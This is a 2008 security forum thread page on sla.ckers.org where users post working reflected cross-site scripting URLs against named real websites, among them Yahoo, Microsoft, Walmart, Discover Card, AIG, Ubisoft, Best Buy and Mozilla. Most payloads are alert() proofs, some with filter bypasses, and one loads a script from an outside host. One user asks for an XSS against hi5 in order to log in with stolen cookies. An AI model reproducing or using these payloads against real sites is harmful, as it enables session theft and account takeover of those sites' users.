Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 59 of 65
Re: So it begins
Posted by: PaPPy
Date: November 01, 2008 07:28AM

removed by request

http://www.xssed.com/archive/author=PaPPy/



Edited 3 time(s). Last edit at 11/07/2008 07:01PM by PaPPy.

Re: So it begins
Posted by: apnovi
Date: November 04, 2008 10:08AM

I'm presuming it's vulnerable to SQL injection too, just haven't got the time to play with it at the moment.

http://www.ellis-brigham.com/cgi-bin/psProdSrch.cgi?mode=user&orderBy=relevance&searchScope=shop&search_text=dd%22%3E%3CScript%3Ealert%28111%29%3B%3C%2Fscript%3E&Button=go

Re: So it begins
Posted by: nemessis
Date: November 10, 2008 08:57AM

http://cf.yp.yahoo.com/about/createfeedback.html?stype=&what=&where=&ucas=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

I don't know why but it doesn't work all the time.

And

http://pix2.search.mud.yahoo.com/index.php?search=%25C0%2522%2520onmouseover%3Dalert(%2Fxss%2F.source)%2520\&x=0&y=0

Put your mouse over the search box.

http://www.rstcenter.com - Romanian Security Team
Limousine rentals



Edited 2 time(s). Last edit at 11/10/2008 09:05AM by nemessis.

Re: So it begins
Posted by: Anonymous User
Date: November 25, 2008 07:29AM

More pXSS

Re: So it begins
Posted by: skpx
Date: December 04, 2008 09:32AM

http://interweb.wikispaces.com/search/view/%3Cscript%3Ealert(%27x%27)%3C%2Fscript%3E+

doesn't seem to work on the main page search only when you search from a username.wikispaces.com ;\

Re: So it begins
Posted by: skpx
Date: December 04, 2008 10:20AM

http://cutelayouts.org/Orkut_images/orkut_images.asp?cat=%3Cscript%3Edocument.getElementById(%27wrapper%27).innerHTML=%27%3Cp%3Eqwerty%3C/p%3E%27;%3C/script%3E

probably a better way to do this

Re: So it begins
Posted by: PaPPy
Date: December 04, 2008 03:02PM

skpx Wrote:
-------------------------------------------------------
> http://cutelayouts.org/Orkut_images/orkut_images.a
> sp?cat=%3Cscript%3Edocument.getElementById(%27wrap
> per%27).innerHTML=%27%3Cp%3Eqwerty%3C/p%3E%27;%3C/
> script%3E
>
> probably a better way to do this

ya just doing an end title </title>

http://www.xssed.com/archive/author=PaPPy/

Re: So it begins
Posted by: C1c4Tr1Z
Date: December 05, 2008 04:46PM

Oh my: http://www.microsoft.com.mk/Default.aspx?tabindex=0&tabid=47&search=<img/src/onerror=alert(/XSS/.source)>

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Re: So it begins
Posted by: PaPPy
Date: December 07, 2008 01:52PM

http://www.walmart.com/search/search-ng.do%3Fsearch_constraint%3D0%26ic%3D48_0%26search_query%3D%27%20onmouseover%3D%27alert%281%29%3B%26Find.x%3D0%26Find.y%3D0%26Find%3DFind

Sorry wally world

http://www.xssed.com/archive/author=PaPPy/

Re: So it begins
Posted by: PaPPy
Date: December 09, 2008 04:27PM

can i has farcry 2 plz?
http://farcry.uk.ubi.com/index.php?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E
http://farcry.us.ubi.com/index.php?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E
http://farcry.de.ubi.com/?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E
http://farcry.fr.ubi.com/?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E
http://farcry.it.ubi.com/?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E
http://farcry.es.ubi.com/?page=%00%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E

http://www.xssed.com/archive/author=PaPPy/

Re: So it begins
Posted by: C1c4Tr1Z
Date: December 10, 2008 01:06PM

http://shop.starwars.com/catalog/product.xml?product_id=1223186;category_id=100750&rid=SWHP3PROD%27,%22%22),$=alert,_=%22XSS%22,$(_)//

I had to bypass something like this (;|[a-zA-Z0-9]+\(.*\))+

PS: Upss! It's McAfee SECURE!

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]



Edited 1 time(s). Last edit at 12/10/2008 01:28PM by C1c4Tr1Z.

Re: So it begins
Posted by: tx
Date: December 12, 2008 11:00PM

http://anonym.to/javascript%3Aalert%28%27xss%27%29//http%3A//%20

-tx @ lowtech-labs.org

Re: So it begins
Posted by: tj
Date: December 13, 2008 08:13AM

is there any xss for hi5 ?

Re: So it begins
Posted by: thrill
Date: December 13, 2008 02:01PM

No, but if you order now, you can get 2 XSS for myspace and 1 for facebook.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: So it begins
Posted by: PaPPy
Date: December 14, 2008 06:09AM

but wait there's more! if you call within the next 5 minutes you get a tube of mighty putty!

http://www.xssed.com/archive/author=PaPPy/

Re: So it begins
Posted by: tj
Date: December 14, 2008 10:36AM

myspace and facebook xss doesn't work. can't login by the cookies...

I'm looking for hi5

Re: So it begins
Posted by: C1c4Tr1Z
Date: December 14, 2008 10:39AM

http://w2.hidemyass.com/index.php?q=aHR0cDovL3d3dy5nb29nbGUuY29tLmFyLz9xPVwiIG9ubW91c2VvdmVyPWFsZXJ0KC9DMWM0VHIxWi8uc291cmNlKT4=

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Re: So it begins
Posted by: Anonymous User
Date: December 14, 2008 10:53AM

@tj: as soon as you understood this - you might wanna try to master that. Then come back here.

Re: So it begins
Posted by: tj
Date: December 14, 2008 11:01AM

hahaha funny :|

Re: So it begins
Posted by: Anonymous User
Date: December 14, 2008 11:43AM

It wasn't meant to be funny. Check what this thread and this whole forum is about and then check if that matches with your posts.

Re: So it begins
Posted by: C1c4Tr1Z
Date: December 15, 2008 06:43PM

http://www.truste.org/ivalidate.php?url=http://www.verisign.com/&sealid=101" onmouseover=alert('XSS') "

We love sarcasm.

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Re: So it begins
Posted by: euronymous
Date: December 18, 2008 06:50AM

Eclipse BIRT reflected XSS (all versions)

XSS will be fixed in milestone 2.5.0 ahaha

see my blog

http://antisnatchor.com/2008/12/18/eclipse-birt-reflected-xss/

Have fun

+++eat, fuck, hack+++

Re: So it begins
Posted by: Anonymous User
Date: December 18, 2008 06:57AM

Talking about Eclipse...

http://localhost:8000/%22%3E%3Cscript%20src=//0x.lv%3E%3C/script%3E

Re: So it begins
Posted by: euronymous
Date: December 19, 2008 02:09AM

ihihihih...nice mariuzzo :)
-------------------------------------------------------
> Talking about Eclipse...
>
> http://localhost:8000/%22%3E%3Cscript%20src=//0x.l
> v%3E%3C/script%3E

+++eat, fuck, hack+++

Re: So it begins
Posted by: Spyware
Date: December 19, 2008 08:53PM

http://www.boyhitscar.com/bhcgallery/Northeast%20Tour%202007.html?page=<script>alert(1)</script>

Love this band :D

Re: So it begins
Date: December 20, 2008 07:27PM

https://www.discovercard.com/cardmembersvcs/acqs/app/exec?bizNameInput=%22%3E%3Cscript%3Ealert(1234)%3C%2Fscript%3E&bizNameOnCardInput=&legalEntityInput=&bizIndustryInput=&employerIdNumberInput1=&employerIdNumberInput2=&yearInBizInput=&businessStreetAddress1Input=&businessStreetAddress2Input=&businessCityInput=&businessStateInput=&businessZipInput=&firstNameInput=&middleNameInput=&lastNameInput=&suffixInput=&homePhoneAreaCode=&homePhonePrefix=&homePhoneSuffix=&emailInput=&homeStreetAddress1Input=&homeStreetAddress2Input=&homeCityInput=&homeStateInput=&homeZipInput=&ssnInput1=&ssnInput2=&ssnInput3=&dobMonthInput=&dobDayInput=&dobYearInput=&annualHouseholdIncomeInput=&housingStatusInput=&businessStreetAddress1Hidden=&businessStreetAddress2Hidden=&businessCityHidden=&businessStateHidden=&businessZipHidden=&authBuyerFirstNameInput=&authBuyerMiddleInitialInput=&authBuyerLastNameInput=&btCheckboxInput=&dynaviewSubmit.%2Fbody%2FformArea%2FsubmitButton.x=97&dynaviewSubmit.%2Fbody%2FformArea%2FsubmitButton.y=2&dynaviewSubmit.%2Fbody%2FformArea%2FsubmitButton=Continue&aid=&pid=&sid=&iq_id=&dynaviewFromComponent=home&dynaviewMain=BIZP
By the looks of it every field is vuln to XSS.

http://www.aig.com/searchresults/search-results_20_17047.html?reqPageNum=1&reqEndPageListing=&qp_CountryCode=US&qp_LanguageCode=en&querySuggestSpellingOption=false&searchHighlightPrefix=searchTerm&queryHighlightOption=true&qt=%22%3E%3Cscript%3Ealert(%27We+got+no+moneis+%3Do(%27)%3C%2Fscript%3E =o(

http://www.bushbeans.com/jaysjournal/journalsubmit.php?promotionid=3&source=none&firstname=%22%3E%3Cscript%3Ealert(/beans/)%3C/script%3E&lastname=aaaa&email=affads%40mail.com&address1=&address2=&city=&state=&zip=11111&phone=&gender=F&Month=12&Day=1&Year=1111&emailformat=Text&oftenconsume=

Re: So it begins
Date: December 21, 2008 03:56PM

Some MS XSSs...

http://www.microsoft.com/canada/athome/security/redirect.aspx?url=%22;alert(/CM/);// looks like they thought of 'security' when making the URL but didn't follow through on it.

http://www.microsoft.com/italy/pmi/voip/voip.aspx?url=javascript:alert(/CM/)

http://sport.ch.msn.com/scripts/tellafriend/tellafriend.php?url=%22%3E%3Cscript%3Ealert(/CM/)%3C/script%3E

Re: So it begins
Posted by: magicmac
Date: December 27, 2008 04:06AM

Hi guys! This is my first post :) The truth is, this XSS found me. :)

EthicalHacker.net

www.ethicalhacker.net/XSS%22onload=%22alert(document.domain)

Re: So it begins
Posted by: C1c4Tr1Z
Date: December 27, 2008 08:37AM

jojo! nice magicmac.

MAD got xssed: http://www.dccomics.com/mad/popup_marginal.php?m=weather_shop_talk%22;alert(/XSS/.source);%22

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Re: So it begins
Posted by: PaPPy
Date: December 27, 2008 04:26PM

http://www.bestbuy.com/site/olspage.jsp?id=cat13506&type=page&skuId=9171709&productId=1218043585577&largeimgurl=/images/screenshots/9171/9171709_pcHomel_006_ss.jpg%22%20onmouseover%3D%22alert(1);&caption=PaPPy%20was%20here!&count=5&total=6

and this one
http://www.lego.com/legostores/features.asp?x=x&store=test<script>alert(1);</script>&cCode=3

also came across this one on mozilla
https://developer.mozilla.org/devnews/index.php/2008/12/18/firefox-20020-now-available-for-download2%22%3E%3C/a%3E%3Cscript%3Ealert(1);%3C/script%3E

http://www.xssed.com/archive/author=PaPPy/



Edited 2 time(s). Last edit at 01/02/2009 12:43PM by PaPPy.
